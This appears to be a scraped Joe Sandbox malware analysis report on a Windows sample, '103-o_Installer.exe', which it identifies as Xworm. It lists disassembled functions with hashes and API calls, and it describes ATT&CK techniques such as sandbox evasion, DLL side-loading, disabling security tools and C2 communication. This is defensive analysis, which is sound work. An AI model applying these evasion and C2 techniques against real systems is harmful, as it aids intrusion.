Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: faf5cb07d6e30351408155d02f86ac8e1247cfffb76f8d01906df2beee9af920
Instruction ID: 3e853aeef85f704da6cd4213f16805b3b90553417758c9c1d55a5ad02f3ff6ff
Opcode Fuzzy Hash: faf5cb07d6e30351408155d02f86ac8e1247cfffb76f8d01906df2beee9af920
Instruction Fuzzy Hash: D411C133804A16ABCB233B74AC05F5B3799EB573B0F22452AF99A9F951DF308840C791

Function 003AD9A5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 003AD9B1

Part of subcall function 003A979C: __getptd_noexit.LIBCMT ref: 003A979F
Part of subcall function 003A979C: __amsg_exit.LIBCMT ref: 003A97AC

__getptd.LIBCMT ref: 003AD9C8
__amsg_exit.LIBCMT ref: 003AD9D6
__lock.LIBCMT ref: 003AD9E6
__updatetlocinfoEx_nolock.LIBCMT ref: 003AD9FA

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: edadf4a9ed61cc6266213714d0694a452d14ec86e9ba8acfa882212887d1f724
Instruction ID: a5bf371ad3d52a8108c6897d0954f93acc61dec7ff9c62e6efe36641c5f24446
Opcode Fuzzy Hash: edadf4a9ed61cc6266213714d0694a452d14ec86e9ba8acfa882212887d1f724
Instruction Fuzzy Hash: E1F090329407149EDB63BB689803B5E73A0EF02724F16420EF556AF9D3CB6598408B56

Function 003A262B Relevance: 6.2, APIs: 4, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8024148dedb523d599393b18b33e046caaf64555ef7a9df732d11554df66e9ce
Instruction ID: 025762bdf7bad554f1935efbb61ddc0d8dcfd3d00a335674e05b128013e02c55
Opcode Fuzzy Hash: 8024148dedb523d599393b18b33e046caaf64555ef7a9df732d11554df66e9ce
Instruction Fuzzy Hash: 63519E75901609AFCF16DFACC9818AFB7F9FF0A314B20056EE542A7652D771AE44CB20

Function 003A5513 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003A55AE
__flush.LIBCMT ref: 003A55CC
__write.LIBCMT ref: 003A55F3
__flsbuf.LIBCMT ref: 003A561E

Part of subcall function 003AA95F: __getptd_noexit.LIBCMT ref: 003AA95F

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: be099eb3870236c6dd2aadf504d5ef235c77f619fd41c052ede7db86fa8fa48e
Instruction ID: 437903998f227ad35c0c67e7dfadf940a40739100eaa81d3d80601a5ea78eeae
Opcode Fuzzy Hash: be099eb3870236c6dd2aadf504d5ef235c77f619fd41c052ede7db86fa8fa48e
Instruction Fuzzy Hash: D941E431A00F049FDB26DF6988846AEBBB7EF83360F29852CE46697590D770DE45CB40

Function 003B3BE5 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B3C19
__isleadbyte_l.LIBCMT ref: 003B3C4C
MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 003B3C7D
MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 003B3CEB

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 33eafa11ad98def418a2a1e9234d79d77e509956fbc5b8822c5e4109f6afb8bf
Instruction ID: 8094fba3f396426046e24adc421db56fdc3adea540afd2e7be478dcacb84c036
Opcode Fuzzy Hash: 33eafa11ad98def418a2a1e9234d79d77e509956fbc5b8822c5e4109f6afb8bf
Instruction Fuzzy Hash: 7D31D331A002A6EFCB22DFA4C884AF97FB5FF01314F168569E265AB591D730DE80DB50

Function 003A913A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 003A9160

Part of subcall function 003A8F8C: __fltout2.LIBCMT ref: 003A8FB7

__cftog_l.LIBCMT ref: 003A9186
__cftoe_l.LIBCMT ref: 003A91B8

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 9b910d03e8b7327379162ea48624bfa8dc65780888aec4ab50b3bebf5c1316b7
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 6B117B7600014ABBCF275F84CC05DEE3F66FB5A390B598856FA1869430D736C9B1AB81

Function 003A168B Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 003A169D
_wprintf.LIBCMT ref: 003A16B5
_wprintf.LIBCMT ref: 003A16CD
_wprintf.LIBCMT ref: 003A16E5

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: _wprintf
String ID:
API String ID: 2738768116-0
Opcode ID: 2549916cb6047d3ee36de9c546a6e9493caf7389bae9190b512b4f1fe44466c1
Instruction ID: a6317207956ed58b2b8ec3d19665b6fe382397ab0bb5501e641bb94299adb8a6
Opcode Fuzzy Hash: 2549916cb6047d3ee36de9c546a6e9493caf7389bae9190b512b4f1fe44466c1
Instruction Fuzzy Hash: CDF03027D4913429A93F71A6244EBCB9F04EB43BF8F26212BFECCEE4E159C1485181E5

Function 003A35C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 003A35E5

Part of subcall function 003A38C7: std::exception::exception.LIBCMT ref: 003A38DC
Part of subcall function 003A38C7: __CxxThrowException@8.LIBCMT ref: 003A38F1

Part of subcall function 003A2279: std::_Xinvalid_argument.LIBCPMT ref: 003A228A

_memmove.LIBCMT ref: 003A3640

Strings

invalid string position, xrefs: 003A35E0

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
String ID: invalid string position
API String ID: 1253240057-1799206989
Opcode ID: 5606f209beca6d9b59f9d5a3f7f6e65a3e22a413d3f68000a1ac01e97084dfe9
Instruction ID: 3c2c05a9b26648fbcec5408e4ea6812902785da9d3f637585a1d0e1fd85fb931
Opcode Fuzzy Hash: 5606f209beca6d9b59f9d5a3f7f6e65a3e22a413d3f68000a1ac01e97084dfe9
Instruction Fuzzy Hash: 9311A731704210BBCB279F1C98D1A6AB3A9EF97710F10092DF9568B391DB71DB01C795

Function 003A215B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 003A2171

Part of subcall function 003A38C7: std::exception::exception.LIBCMT ref: 003A38DC
Part of subcall function 003A38C7: __CxxThrowException@8.LIBCMT ref: 003A38F1

_memmove.LIBCMT ref: 003A21AA

Strings

invalid string position, xrefs: 003A216C

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 22950630-1799206989
Opcode ID: d00a7cdfc602163029ddb83ee11e2d1d684e6e0cd5331956930c94f46433862a
Instruction ID: 6cbd4df51f5cb45224d55eb83ec9ec1d9dd58342c641fb40ef7d58b19f081eb3
Opcode Fuzzy Hash: d00a7cdfc602163029ddb83ee11e2d1d684e6e0cd5331956930c94f46433862a
Instruction Fuzzy Hash: 0101B1313006409BD7269E6CCCC486BB7BAEB827147204D3DE6828BA45DBB4EC4587A0

Function 003A67E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 003A67F4
__invoke_watson.LIBCMT ref: 003A6848

Part of subcall function 003A6683: _strcat_s.LIBCMT ref: 003A66A2

Strings

&k:, xrefs: 003A67EA, 003A67ED

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: __invoke_watson_strcat_s_strcpy_s
String ID: &k:
API String ID: 312943863-2206501022
Opcode ID: 19f811498c503797a990f38c39f5063f992842676a9e3917b59691a60135d52e
Instruction ID: 74541c4c94950748f94f09bf531cce71d970ba1d5a3810152d9bdac9377860c8
Opcode Fuzzy Hash: 19f811498c503797a990f38c39f5063f992842676a9e3917b59691a60135d52e
Instruction Fuzzy Hash: F3F06D725402587BDF136AA08C4BEEA3F5DEB02764F498062FA195A062E7369E14D790

Function 003A7AB9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003A4895: __getptd.LIBCMT ref: 003A489B
Part of subcall function 003A4895: __getptd.LIBCMT ref: 003A48AB

__getptd.LIBCMT ref: 003A7AC8

Part of subcall function 003A979C: __getptd_noexit.LIBCMT ref: 003A979F
Part of subcall function 003A979C: __amsg_exit.LIBCMT ref: 003A97AC

__getptd.LIBCMT ref: 003A7AD6

Strings

csm, xrefs: 003A7AE4

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
Instruction ID: 194e2ae5c68ce324b8aa910c8fb5cd2cbe2dabeaaec5964be46944d939c3d5fc
Opcode Fuzzy Hash: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
Instruction Fuzzy Hash: 4A016279805205CBCF3A9F22DC8866DB3B9EF16311F25482EE0415A561CB758981CBA1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 103-o_Installer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Downloads\ind.cod

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Windows Analysis Report
103-o_Installer.exe

Function 003A11E1 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 89
filesleepmemoryCOMMON

Function 003A2E5D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
networkfileCOMMON

Function 003A2E58 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
networkfileCOMMON

Function 02EDFFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Function 003A297F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Function 02EE00CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Function 003A2F3D Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23
memoryCOMMON

Function 02EDFB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Function 003A5902 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE